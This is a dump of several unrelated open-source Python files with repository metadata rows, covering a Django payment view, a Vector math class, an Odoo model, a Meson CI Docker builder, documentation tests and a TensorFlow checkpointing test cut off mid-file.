def start(request, template='buysafe/start.html'):
keyword_args = {}
for k in request.POST:
keyword_args[k] = request.POST[k]
context = {}
info = call_handler(
'BUYSAFE_FORM_VALUES_GENERATOR',
default_order_info_handler,
request=request, context=context, **keyword_args
)
forms = []
payment_methods = PaymentMethod.enabled.all()
for method in payment_methods:
form_model = PAYMENT_SEND_FORMS[method.payment_type]
info['store_name'] = method.store_id
form = form_model(
store_password=method.password, initial=info
)
form.fill_checksum()
form.submit_button_title = method.name
forms.append(form)
context['forms'] = forms
return call_handler_and_render(
'BUYSAFE_START_HANDLER', None,
request=request, template=template, context=context,
forms=forms, payment_methods=payment_methods
)
@csrf_exempt
@require_POST
def success(request, payment_type, template='buysafe/success.html'):
context = {}
payment_type = int(payment_type)
form = get_payment_form(payment_type, request.POST)
if form is None:
return call_handler_and_render(
'BUYSAFE_SUCCESS_INVALID_HANDLER',
make_response_handler(HttpResponseBadRequest),
request=request, context=context, form=form
)
context['data'] = form.cleaned_data
send_type = form.cleaned_data['send_type']
if send_type == SunTechReceiveForm.SEND_TYPE.BACKGROUND:
return call_handler_and_render(
'BUYSAFE_SUCCESS_BACKGROUND_HANDLER',
make_response_handler(HttpResponse),
request=request, context=context, form=form
)
return call_handler_and_render(
'BUYSAFE_SUCCESS_RENDER_HANDLER', None,
request=request, template=template, context=context, form=form
)
@csrf_exempt
@require_POST
def fail(request, payment_type, template='buysafe/fail.html'):
context = {}
payment_type = int(payment_type)
form = get_payment_form(payment_type, request.POST)
if form is None:
return call_handler_and_render(
'BUYSAFE_FAIL_INVALID_HANDLER',
make_response_handler(HttpResponseBadRequest),
request=request, context=context, form=form
)
context['data'] = form.cleaned_data
send_type = form.cleaned_data['send_type']
if send_type == SunTechReceiveForm.SEND_TYPE.BACKGROUND:
return call_handler_and_render(
'BUYSAFE_FAIL_BACKGROUND_HANDLER',
make_response_handler(HttpResponse),
request=request, context=context, form=form
)
return call_handler_and_render(
'BUYSAFE_FAIL_RENDER_HANDLER', None,
request=request, template=template, context=context, form=form
)
@csrf_exempt
@require_POST
def check(request, payment_type):
context = {}
payment_type = int(payment_type)
form = get_payment_form(payment_type, request.POST)
if form is None:
return call_handler_and_render(
'BUYSAFE_CHECK_INVALID_HANDLER',
make_response_handler(HttpResponseBadRequest),
request=request, context=context, form=form
)
send_type = form.cleaned_data['send_type']
if send_type == SunTechReceiveForm.SEND_TYPE.BACKGROUND:
return call_handler_and_render(
'BUYSAFE_CHECK_HANDLER',
make_response_handler(HttpResponse, '0000'),
request=request, context=context, form=form
)
return HttpResponse('0000')
return call_handler_and_render(
'BUYSAFE_CHECK_INVALID_HANDLER',
make_response_handler(HttpResponseBadRequest),
request=request, context=context, form=form
)
| bsd-3-clause | 1,343,312,534,143,397,400 | 32.614815 | 77 | 0.667254 | false |
rndusr/stig | tests/client_test/aiotransmission_test/api_freespace_test.py | 1 | 1115 | from types import SimpleNamespace
import asynctest
from asynctest import CoroutineMock, Mock, call
from stig.client.aiotransmission.api_freespace import FreeSpaceAPI
class TestFreeSpaceAPI(asynctest.ClockedTestCase):
async def setUp(self):
self.rpc = SimpleNamespace(free_space=CoroutineMock())
self.freespace = FreeSpaceAPI((), self.rpc, Mock())
async def test_expected_path_matches(self):
self.rpc.free_space.return_value = {'path': '/some/path', 'size-bytes': 123}
self.assertEqual(await self.freespace.get_free_space('/some/path'), 123)
self.assertEqual(self.rpc.free_space.call_args_list, [call(path='/some/path')])
async def test_expected_path_mismatches(self):
self.rpc.free_space.return_value = {'path': '/different/path', 'size-bytes': 123}
with self.assertRaises(RuntimeError) as cm:
await self.freespace.get_free_space('/some/path')
self.assertEqual(str(cm.exception), "Expected path '/some/path', got '/different/path'")
self.assertEqual(self.rpc.free_space.call_args_list, [call(path='/some/path')])
| gpl-3.0 | 8,247,601,294,170,028,000 | 45.458333 | 96 | 0.698655 | false |
lavotap/pylib | pylib/vector.py | 1 | 6075 | #!/usr/bin/env python
#-*-coding:utf-8-*-
import math
from number import Number
class Vector(object):
# 验证是否为向量
@classmethod
def is_vector(cls,vector):
if hasattr(vector,'get_value'):
return True
else:
return False
def __init__(self,x=0,y=0,z=0):
if hasattr(x,'__getitem__'):
self.x=x[0]
self.y=x[1]
if len(x)==3:
self.z=x[2]
else:
self.z=0
elif Vector.is_vector(x):
self.x=x.x
self.y=x.y
self.z=x.z
elif Number.is_number(x) and Number.is_number(y) and Number.is_number(z):
self.x=float(x)
self.y=float(y)
self.z=float(z)
else:
print("ERROR:<__init__@Vector>:Can not init.\n")
exit()
self.vector=(self.x,self.y,self.z)
# 判断是否为向量的依据
def get_value(self):
return (self.x,self.y,self.z)
def __str__(self):
if self.z!=0:
return("Vector(%s,%s,%s)"%(Number(self.x).format(),Number(self.y).format(),Number(self.z).format()))
else:
return("Vector(%s,%s)"%(Number(self.x).format(),Number(self.y).format()))
def __add__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
return Vector(self.x+x,self.y+y,self.z+z)
else:
exit("ERROR:<__add__@Vector>:Can not add.\n")
def __iadd__(self, other):
return Vector(self.vector)+other
def __sub__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
return Vector(self.x-x,self.y-y,self.z-z)
else:
exit("ERROR:<__sub__@Vector>:Can not subtract.\n")
def __isub__(self, other):
return Vector(self.vector)-other
def __mul__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
return self.x*x+self.y*y+self.z*z
elif Number.is_number(other):
return Vector(self.x*other,self.y*other,self.z*other)
else:
exit("ERROR:<__mul__@Vector>:Can not multiply.\n")
def __imul__(self, other):
return Vector(self.vector)*other
def __div__(self, other):
if Number.is_number(other):
return Vector(self.x/other,self.y/other,self.z/other)
else:
exit("ERROR:<__div__@Vector>:Can not divide.\n")
def __idiv__(self, other):
return Vector(self.vector)/other
def __floordiv__(self, other):
if Number.is_number(other):
return Vector(self.x//other,self.y//other,self.z//other)
else:
exit("ERROR:<__floordiv__@Vector>:Can not divide.\n")
def __xor__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
return Vector(self.y*z-y*self.z,self.z*x-z*self.x,self.x*y-x*self.y)
else:
exit("ERROR:<__xor__@Vector>:Can not cross multiply.\n")
def __ixor__(self, other):
return Vector(self.vector)^other
def __eq__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
if self.x==x and self.y==y and self.z==z:
return True
else:
return False
else:
exit("ERROR:<__eq__@Vector>:Can not compile.\n")
def __ne__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
if self.x==x and self.y==y and self.z==z:
return False
else:
return True
else:
exit("ERROR:<__ne__@Vector>:Can not compile.\n")
def __gt__(self, other):
if Vector.is_vector(other):
if self.get_length()>other.get_length:
return True
else:
return False
else:
exit("ERROR:<__gt__@Vector>:Can not compile.\n")
def __lt__(self, other):
if Vector.is_vector(other):
if self.get_length()<other.get_length:
return True
else:
return False
else:
exit("ERROR:<__lt__@Vector>:Can not compile.\n")
def __ge__(self, other):
if Vector.is_vector(other):
if self.get_length()>=other.get_length:
return True
else:
return False
else:
exit("ERROR:<__gt__@Vector>:Can not compile.\n")
def __le__(self, other):
if Vector.is_vector(other):
if self.get_length()<=other.get_length:
return True
else:
return False
else:
exit("ERROR:<__lt__@Vector>:Can not compile.\n")
# 向量的模
def get_length(self):
return math.sqrt(self.x**2+self.y**2+self.z**2)
# 单位向量
def get_unit(self):
length=Vector(self.vector).get_length()
return Vector(self.x/length,self.y/length,self.z/length)
# 从self.vector到other向量的无符号夹角
def get_theta(self,other):
if Vector.is_vector(other):
value=(Vector(self.vector)*other)/(Vector(self.vector).get_length()*other.get_length())
return math.acos(value)/math.pi*180.0
else:
exit("ERROR:<get_theta@Vector>:Can not get theta.\n")
# 从self.vector到other向量的带符号夹角,other从self.vector出发逆时针为正,顺时针为负
def get_theta_with_sign(self,other):
theta=self.get_theta(other)
if (Vector(self.vector)^other).z<0:
return theta*-1
else:
return theta
# 求左垂直,右垂直向量
def get_left(self):
return Vector(-1*self.y,self.x,0)
def get_right(self):
return Vector(self.y,-1*self.x,0)
| gpl-2.0 | 1,054,030,773,827,123,800 | 27.533654 | 112 | 0.505307 | false |
MostlyOpen/odoo_addons | myo_lab_test/models/lab_test_result_state.py | 1 | 2119 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from openerp import api, fields, models
class LabTestResult(models.Model):
_inherit = 'myo.lab_test.result'
state = fields.Selection([
('draft', 'Draft'),
('started', 'Started'),
('transcribed', 'Transcribed'),
('released', 'Released'),
('canceled', 'Canceled'),
], string='Status', default='draft', readonly=True, required=True, help="")
@api.multi
def change_state(self, new_state):
for lab_test_result in self:
lab_test_result.state = new_state
@api.multi
def action_draft(self):
for lab_test_result in self:
lab_test_result.change_state('draft')
@api.multi
def action_started(self):
for lab_test_result in self:
lab_test_result.change_state('started')
@api.multi
def action_transcribed(self):
for lab_test_result in self:
lab_test_result.change_state('transcribed')
@api.multi
def action_select(self):
for lab_test_result in self:
lab_test_result.change_state('released')
@api.multi
def action_cancel(self):
for lab_test_result in self:
lab_test_result.change_state('canceled')
| agpl-3.0 | 5,988,174,225,687,661,000 | 32.634921 | 79 | 0.60689 | false |
QuLogic/meson | ci/ciimage/build.py | 1 | 7346 | #!/usr/bin/env python3
import json
import argparse
import stat
import textwrap
import shutil
import subprocess
from tempfile import TemporaryDirectory
from pathlib import Path
import typing as T
image_namespace = 'mesonbuild'
image_def_file = 'image.json'
install_script = 'install.sh'
class ImageDef:
def __init__(self, image_dir: Path) -> None:
path = image_dir / image_def_file
data = json.loads(path.read_text())
assert isinstance(data, dict)
assert all([x in data for x in ['base_image', 'env']])
assert isinstance(data['base_image'], str)
assert isinstance(data['env'], dict)
self.base_image: str = data['base_image']
self.args: T.List[str] = data.get('args', [])
self.env: T.Dict[str, str] = data['env']
class BuilderBase():
def __init__(self, data_dir: Path, temp_dir: Path) -> None:
self.data_dir = data_dir
self.temp_dir = temp_dir
self.common_sh = self.data_dir.parent / 'common.sh'
self.common_sh = self.common_sh.resolve(strict=True)
self.validate_data_dir()
self.image_def = ImageDef(self.data_dir)
self.docker = shutil.which('docker')
self.git = shutil.which('git')
if self.docker is None:
raise RuntimeError('Unable to find docker')
if self.git is None:
raise RuntimeError('Unable to find git')
def validate_data_dir(self) -> None:
files = [
self.data_dir / image_def_file,
self.data_dir / install_script,
]
if not self.data_dir.exists():
raise RuntimeError(f'{self.data_dir.as_posix()} does not exist')
for i in files:
if not i.exists():
raise RuntimeError(f'{i.as_posix()} does not exist')
if not i.is_file():
raise RuntimeError(f'{i.as_posix()} is not a regular file')
class Builder(BuilderBase):
def gen_bashrc(self) -> None:
out_file = self.temp_dir / 'env_vars.sh'
out_data = ''
# run_tests.py parameters
self.image_def.env['CI_ARGS'] = ' '.join(self.image_def.args)
for key, val in self.image_def.env.items():
out_data += f'export {key}="{val}"\n'
# Also add /ci to PATH
out_data += 'export PATH="/ci:$PATH"\n'
out_file.write_text(out_data)
# make it executable
mode = out_file.stat().st_mode
out_file.chmod(mode | stat.S_IEXEC)
def gen_dockerfile(self) -> None:
out_file = self.temp_dir / 'Dockerfile'
out_data = textwrap.dedent(f'''\
FROM {self.image_def.base_image}
ADD install.sh /ci/install.sh
ADD common.sh /ci/common.sh
ADD env_vars.sh /ci/env_vars.sh
RUN /ci/install.sh
''')
out_file.write_text(out_data)
def do_build(self) -> None:
# copy files
for i in self.data_dir.iterdir():
shutil.copy(str(i), str(self.temp_dir))
shutil.copy(str(self.common_sh), str(self.temp_dir))
self.gen_bashrc()
self.gen_dockerfile()
cmd_git = [self.git, 'rev-parse', '--short', 'HEAD']
res = subprocess.run(cmd_git, cwd=self.data_dir, stdout=subprocess.PIPE)
if res.returncode != 0:
raise RuntimeError('Failed to get the current commit hash')
commit_hash = res.stdout.decode().strip()
cmd = [
self.docker, 'build',
'-t', f'{image_namespace}/{self.data_dir.name}:latest',
'-t', f'{image_namespace}/{self.data_dir.name}:{commit_hash}',
'--pull',
self.temp_dir.as_posix(),
]
if subprocess.run(cmd).returncode != 0:
raise RuntimeError('Failed to build the docker image')
class ImageTester(BuilderBase):
def __init__(self, data_dir: Path, temp_dir: Path, ci_root: Path) -> None:
super().__init__(data_dir, temp_dir)
self.meson_root = ci_root.parent.parent.resolve()
def gen_dockerfile(self) -> None:
out_file = self.temp_dir / 'Dockerfile'
out_data = textwrap.dedent(f'''\
FROM {image_namespace}/{self.data_dir.name}
ADD meson /meson
''')
out_file.write_text(out_data)
def copy_meson(self) -> None:
shutil.copytree(
self.meson_root,
self.temp_dir / 'meson',
ignore=shutil.ignore_patterns(
'.git',
'*_cache',
'__pycache__',
# 'work area',
self.temp_dir.name,
)
)
def do_test(self, tty: bool = False) -> None:
self.copy_meson()
self.gen_dockerfile()
try:
build_cmd = [
self.docker, 'build',
'-t', 'meson_test_image',
self.temp_dir.as_posix(),
]
if subprocess.run(build_cmd).returncode != 0:
raise RuntimeError('Failed to build the test docker image')
test_cmd = []
if tty:
test_cmd = [
self.docker, 'run', '--rm', '-t', '-i', 'meson_test_image',
'/bin/bash', '-c', ''
+ 'cd meson;'
+ 'source /ci/env_vars.sh;'
+ f'echo -e "\\n\\nInteractive test shell in the {image_namespace}/{self.data_dir.name} container with the current meson tree";'
+ 'echo -e "The file ci/ciimage/user.sh will be sourced if it exists to enable user specific configurations";'
+ 'echo -e "Run the following command to run all CI tests: ./run_tests.py $CI_ARGS\\n\\n";'
+ '[ -f ci/ciimage/user.sh ] && exec /bin/bash --init-file ci/ciimage/user.sh;'
+ 'exec /bin/bash;'
]
else:
test_cmd = [
self.docker, 'run', '--rm', '-t', 'meson_test_image',
'/bin/bash', '-c', 'source /ci/env_vars.sh; cd meson; ./run_tests.py $CI_ARGS'
]
if subprocess.run(test_cmd).returncode != 0 and not tty:
raise RuntimeError('Running tests failed')
finally:
cleanup_cmd = [self.docker, 'rmi', '-f', 'meson_test_image']
subprocess.run(cleanup_cmd).returncode
def main() -> None:
parser = argparse.ArgumentParser(description='Meson CI image builder')
parser.add_argument('what', type=str, help='Which image to build / test')
parser.add_argument('-t', '--type', choices=['build', 'test', 'testTTY'], help='What to do', required=True)
args = parser.parse_args()
ci_root = Path(__file__).parent
ci_data = ci_root / args.what
with TemporaryDirectory(prefix=f'{args.type}_{args.what}_', dir=ci_root) as td:
ci_build = Path(td)
print(f'Build dir: {ci_build}')
if args.type == 'build':
builder = Builder(ci_data, ci_build)
builder.do_build()
elif args.type == 'test':
tester = ImageTester(ci_data, ci_build, ci_root)
tester.do_test()
elif args.type == 'testTTY':
tester = ImageTester(ci_data, ci_build, ci_root)
tester.do_test(tty=True)
if __name__ == '__main__':
main()
| apache-2.0 | -3,836,532,305,260,080,600 | 33.650943 | 148 | 0.539613 | false |
pmacosta/putil | tests/test_doccode.py | 1 | 12976 | # test_doccode.py
# Copyright (c) 2013-2016 Pablo Acosta-Serafini
# See LICENSE for details
# pylint: disable=C0111,C0302,E1129,R0914,R0915,W0212,W0640
# Standard library imports
from __future__ import print_function
import os
import shutil
import subprocess
import sys
# PyPI imports
import matplotlib
# Putil imports
import putil.misc
from putil.test import AE
# Default to non-interactive PNG to avoid any
# matplotlib back-end misconfiguration
matplotlib.rcParams['backend'] = 'Agg'
###
# Functions
###
def export_image(fname, method=True):
tdir = os.path.dirname(
os.path.dirname(os.path.abspath(__file__))
)
artifact_dir = os.path.join(tdir, 'artifacts')
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir)
if method:
src = fname
dst = os.path.join(artifact_dir, os.path.basename(fname))
shutil.copyfile(src, dst)
else:
if os.environ.get('APPVEYOR', None):
proc = subprocess.Popen(
['appveyor', 'PushArtifact', os.path.realpath(fname)],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
proc.communicate()
elif os.environ.get('TRAVIS', None):
# If only a few binary files need to be exported a hex dump works,
# otherwise the log can grow past 4MB and the process is terminated
# by Travis
proc = subprocess.Popen(
[
os.path.join(tdir, 'sbin', 'png-to-console.sh'),
os.path.realpath(fname)
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
stdout, _ = proc.communicate()
print(stdout)
def test_exdoc_doccode():
""" Test code used in exdoc module """
def remove_header(stdout):
""" Remove py.test header """
actual_text = []
off_header = False
lines = (
stdout.split('\n')
if sys.hexversion < 0x03000000 else
stdout.decode('ascii').split('\n')
)
for line in lines:
off_header = line.startswith('Callable:') or off_header
if off_header:
actual_text.append(line)
return '\n'.join(actual_text)
# Test tracing module #1 (py.test based)
script_dir = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'docs',
'support'
)
script_name = os.path.join(script_dir, 'trace_my_module_1.py')
proc = subprocess.Popen(['python', script_name], stdout=subprocess.PIPE)
stdout, stderr = proc.communicate()
actual_text = remove_header(stdout)
ref_list = []
ref_list.append('Callable: docs.support.my_module.func')
ref_list.append('.. Auto-generated exceptions documentation for')
ref_list.append('.. docs.support.my_module.func')
ref_list.append('')
ref_list.append(':raises: TypeError (Argument \\`name\\` is not valid)')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_list.append('Callable: docs.support.my_module.MyClass.value')
ref_list.append('.. Auto-generated exceptions documentation for')
ref_list.append('.. docs.support.my_module.MyClass.value')
ref_list.append('')
ref_list.append(':raises:')
ref_list.append(' * When assigned')
ref_list.append('')
ref_list.append(' * RuntimeError (Argument \\`value\\` is not valid)')
ref_list.append('')
ref_list.append(' * When retrieved')
ref_list.append('')
ref_list.append(' * RuntimeError (Attribute \\`value\\` not set)')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_text = (os.linesep).join(ref_list)
if actual_text != ref_text:
print('STDOUT: {0}'.format(stdout))
print('STDERR: {0}'.format(stderr))
assert actual_text == ref_text
# Test tracing module #2 (simple usage based)
script_name = os.path.join(script_dir, 'trace_my_module_2.py')
proc = subprocess.Popen(['python', script_name], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
actual_text = remove_header(stdout)
assert actual_text == ref_text
# Test cogging
script_name = os.path.join(script_dir, 'build-docs.sh')
input_file = os.path.join(script_dir, 'my_module.py')
output_file = os.path.join(script_dir, 'my_module_out.py')
with putil.misc.ignored(OSError):
os.remove(output_file)
bin_dir = os.environ['BIN_DIR']
proc = subprocess.Popen(
[
'python',
os.path.join(bin_dir, 'cog.py'),
'-e',
'-o', output_file,
input_file
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
stdout, _ = proc.communicate()
retcode = proc.returncode
if retcode:
print(stdout)
raise RuntimeError('Tracing did not complete successfully')
# Read reference
ref_fname = os.path.join(script_dir, 'my_module_ref.py')
with open(ref_fname, 'r') as fobj:
ref_text = fobj.readlines()
# Read generated output
with open(output_file, 'r') as fobj:
actual_text = fobj.readlines()
with putil.misc.ignored(OSError):
os.remove(output_file)
# First line is the file name, which is different
assert actual_text[1:] == ref_text[1:]
def test_pcsv_doccode():
""" Test code used in pcsv module """
script_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', 'docs', 'support'
)
for num in range(1, 7):
script_name = os.path.join(
script_dir, 'pcsv_example_{0}.py'.format(num))
proc = subprocess.Popen(
['python', script_name], stdout=subprocess.PIPE
)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
print('Script: {0}'.format(script_name))
print('STDOUT: {0}'.format(stdout))
print('STDERR: {0}'.format(stderr))
assert proc.returncode == 0
def test_pcontracts_doccode():
""" Test code used in pcontracts module """
# pylint: disable=W0612
from docs.support.pcontracts_example_2 import (custom_contract_a,
custom_contract_b)
@putil.pcontracts.contract(name='custom_contract_a')
def funca(name):
print('My name is {0}'.format(name))
@putil.pcontracts.contract(name='custom_contract_b')
def funcb(name):
print('My name is {0}'.format(name))
AE(funca, RuntimeError, 'Only one exception', name='')
funca('John')
AE(funcb, RuntimeError, 'Empty', name='')
AE(funcb, RuntimeError, 'Invalid name', name='[Bracket]')
funcb('John')
from docs.support.pcontracts_example_3 import (
custom_contract1,
custom_contract2,
custom_contract3,
custom_contract4,
custom_contract5
)
from docs.support.pcontracts_example_3 import (
custom_contract6,
custom_contract7,
custom_contract8,
custom_contract9,
custom_contract10
)
# Contract 1
@putil.pcontracts.contract(name='custom_contract1')
def func1(name):
return name
AE(func1, RuntimeError, 'Invalid name', name='')
assert func1('John') == 'John'
# Contract 2
@putil.pcontracts.contract(name='custom_contract2')
def func2(name):
return name
AE(func2, RuntimeError, 'Invalid name', name='')
assert func2('John') == 'John'
# Contract 3
@putil.pcontracts.contract(name='custom_contract3')
def func3(name):
return name
AE(func3, ValueError, 'Argument `name` is not valid', name='')
assert func3('John') == 'John'
# Contract 4
@putil.pcontracts.contract(name='custom_contract4')
def func4(name):
return name
AE(func4, ValueError, 'Argument `name` is not valid', name='')
assert func4('John') == 'John'
# Contract 5
@putil.pcontracts.contract(name='custom_contract5')
def func5(name):
return name
AE(func5, RuntimeError, 'Invalid name', name='')
assert func5('John') == 'John'
# Contract 6
@putil.pcontracts.contract(name='custom_contract6')
def func6(name):
return name
AE(func6, RuntimeError, 'Invalid name', name='')
assert func6('John') == 'John'
# Contract 7
@putil.pcontracts.contract(name='custom_contract7')
def func7(name):
return name
AE(func7, OSError, 'File could not be opened', name='')
assert func7('John') == 'John'
# Contract 8
@putil.pcontracts.contract(name='custom_contract8')
def func8(name):
return name
AE(func8, RuntimeError, 'Invalid name', name='')
assert func8('John') == 'John'
# Contract 9
@putil.pcontracts.contract(name='custom_contract9')
def func9(name):
return name
AE(func9, TypeError, 'Argument `name` is not valid', name='')
assert func9('John') == 'John'
# Contract 10
@putil.pcontracts.contract(name='custom_contract10')
def func10(name):
return name
AE(func10, RuntimeError, 'Argument `name` is not valid', name='')
assert func10('John') == 'John'
def test_plot_doccode(capsys):
""" Test used in plot module """
# pylint: disable=E1103,R0204
from tests.plot.fixtures import compare_images
script_dir = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'docs',
'support'
)
script_name = os.path.join(script_dir, 'plot_example_1.py')
output_file = os.path.join(script_dir, 'test_image.png')
proc = subprocess.Popen(
['python', script_name, output_file],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
stdout, stderr = proc.communicate()
test_fname = output_file
nimages = 11
ref_names = [
'plot_example_1_{0}.png'.format(item) for item in range(1, nimages+1)
]
ref_fnames = [os.path.join(script_dir, item) for item in ref_names]
result = []
for ref_fname in ref_fnames:
try:
result.append(compare_images(ref_fname, test_fname))
except IOError:
print('Error comparing images')
print('STDOUT: {0}'.format(stdout))
print('STDERR: {0}'.format(stderr))
raise
if not any(result):
print('Images do not match')
print('STDOUT: {0}'.format(stdout))
print('STDERR: {0}'.format(stderr))
for num, ref_fname in enumerate(ref_fnames):
print(
'Reference image {0}: file://{1}'.format(
num, os.path.realpath(ref_fname)
)
)
print('Actual image: file://{0}'.format(os.path.realpath(test_fname)))
export_image(test_fname)
assert result
with putil.misc.ignored(OSError):
os.remove(test_fname)
# Test ABC example
import numpy
import docs.support.plot_example_2
obj = docs.support.plot_example_2.MySource()
obj.indep_var = numpy.array([1, 2, 3])
obj.dep_var = numpy.array([-1, 1, -1])
assert obj.indep_var.tolist() == [1, 2, 3]
assert obj.dep_var.tolist() == [-1, 1, -1]
assert obj._complete
#
import docs.support.plot_example_3
ivar, dvar = docs.support.plot_example_3.proc_func1(
1e-12, numpy.array([1, 2])
)
dvar = dvar.tolist()
assert ivar, dvar == (1, [0, 1])
obj = docs.support.plot_example_3.create_csv_source()
assert obj.indep_var.tolist() == [2, 3, 4]
assert obj.dep_var.tolist() == [0, -30, 10]
#
import docs.support.plot_example_4
obj = docs.support.plot_example_4.create_basic_source()
assert obj.indep_var.tolist() == [2, 3]
assert obj.dep_var.tolist() == [-10, 10]
assert obj._complete
#
import docs.support.plot_example_5
obj = docs.support.plot_example_5.create_csv_source()
assert obj.indep_var.tolist() == [10, 11, 12, 13, 14]
assert obj.dep_var.tolist() == [16, 6, 26, -4, 36]
#
import docs.support.plot_example_6
docs.support.plot_example_6.panel_iterator_example(no_print=False)
stdout, stderr = capsys.readouterr()
ref = (
'Series 1:\n'
'Independent variable: [ 1.0, 2.0, 3.0, 4.0 ]\n'
'Dependent variable: [ 1.0, -10.0, 10.0, 5.0 ]\n'
'Label: Goals\n'
'Color: k\n'
'Marker: o\n'
'Interpolation: CUBIC\n'
'Line style: -\n'
'Secondary axis: False\n'
'\n'
'Series 2:\n'
'Independent variable: [ 100.0, 200.0, 300.0, 400.0 ]\n'
'Dependent variable: [ 50.0, 75.0, 100.0, 125.0 ]\n'
'Label: Saves\n'
'Color: b\n'
'Marker: None\n'
'Interpolation: STRAIGHT\n'
'Line style: --\n'
'Secondary axis: False\n\n'
)
assert stdout == ref
| mit | -3,682,959,280,773,998,000 | 33.695187 | 79 | 0.594482 | false |
allenlavoie/tensorflow | tensorflow/contrib/optimizer_v2/checkpointable_utils_test.py | 1 | 32824 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# TODO(josh11b): Forked from contrib/eager/python to test OptimizerV2 the same way
# OptimizerV1 is tested. This file should be removed once the fork is resolved.
import functools
import os
import six
from tensorflow.contrib.eager.python import checkpointable_utils
from tensorflow.contrib.optimizer_v2 import adam
from tensorflow.python.client import session as session_lib
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.keras._impl.keras.engine import training
from tensorflow.python.keras._impl.keras.layers import core
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.training import checkpointable
from tensorflow.python.training import saver as core_saver
from tensorflow.python.training import training_util
class NonLayerCheckpointable(checkpointable.Checkpointable):
def __init__(self):
super(NonLayerCheckpointable, self).__init__()
self.a_variable = checkpointable_utils.add_variable(
self, name="a_variable", shape=[])
# pylint: disable=not-callable
class MyModel(training.Model):
"""A concrete Model for testing."""
def __init__(self):
super(MyModel, self).__init__()
self._named_dense = core.Dense(1, use_bias=True)
self._second = core.Dense(1, use_bias=False)
# We can still track Checkpointables which aren't Layers.
self._non_layer = NonLayerCheckpointable()
def call(self, values):
ret = self._second(self._named_dense(values))
return ret
class _MirroringSaveable(
core_saver.BaseSaverBuilder.ResourceVariableSaveable):
def __init__(self, primary_variable, mirrored_variable, name):
self._primary_variable = primary_variable
self._mirrored_variable = mirrored_variable
super(_MirroringSaveable, self).__init__(
self._primary_variable, "", name)
def restore(self, restored_tensors, restored_shapes):
"""Restore the same value into both variables."""
tensor, = restored_tensors
return control_flow_ops.group(
self._primary_variable.assign(tensor),
self._mirrored_variable.assign(tensor))
class _OwnsMirroredVariables(checkpointable.CheckpointableBase):
"""A Checkpointable object which returns a more complex SaveableObject."""
def __init__(self):
self.non_dep_variable = variable_scope.get_variable(
name="non_dep_variable", initializer=6., use_resource=True)
self.mirrored = variable_scope.get_variable(
name="mirrored", initializer=15., use_resource=True)
def _gather_saveables_for_checkpoint(self):
def _saveable_factory(name=self.non_dep_variable.name):
return _MirroringSaveable(
primary_variable=self.non_dep_variable,
mirrored_variable=self.mirrored,
name=name)
return {checkpointable.VARIABLE_VALUE_KEY: _saveable_factory}
# The Saver sorts by name before parsing, so we need a name property.
@property
def name(self):
return self.non_dep_variable.name
class CheckpointingTests(test.TestCase):
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def testNamingWithOptimizer(self):
input_value = constant_op.constant([[3.]])
model = MyModel()
# A nuisance Model using the same optimizer. Its slot variables should not
# go in the checkpoint, since it is never depended on.
other_model = MyModel()
optimizer = adam.AdamOptimizer(0.001)
optimizer_step = training_util.get_or_create_global_step()
root_checkpointable = checkpointable_utils.Checkpoint(
optimizer=optimizer, model=model, optimizer_step=optimizer_step)
if context.executing_eagerly():
optimizer.minimize(
lambda: model(input_value),
global_step=optimizer_step)
optimizer.minimize(
lambda: other_model(input_value),
global_step=optimizer_step)
else:
train_op = optimizer.minimize(
model(input_value), global_step=optimizer_step)
optimizer.minimize(
other_model(input_value),
global_step=optimizer_step)
self.evaluate(checkpointable_utils.gather_initializers(
root_checkpointable))
self.evaluate(train_op)
named_variables, serialized_graph = (
checkpointable_utils._serialize_object_graph(root_checkpointable))
expected_checkpoint_names = (
# Created in the root node, so no prefix.
"optimizer_step",
"model/_second/kernel",
"model/_named_dense/kernel",
"model/_named_dense/bias",
# non-Layer dependency of the model
"model/_non_layer/a_variable",
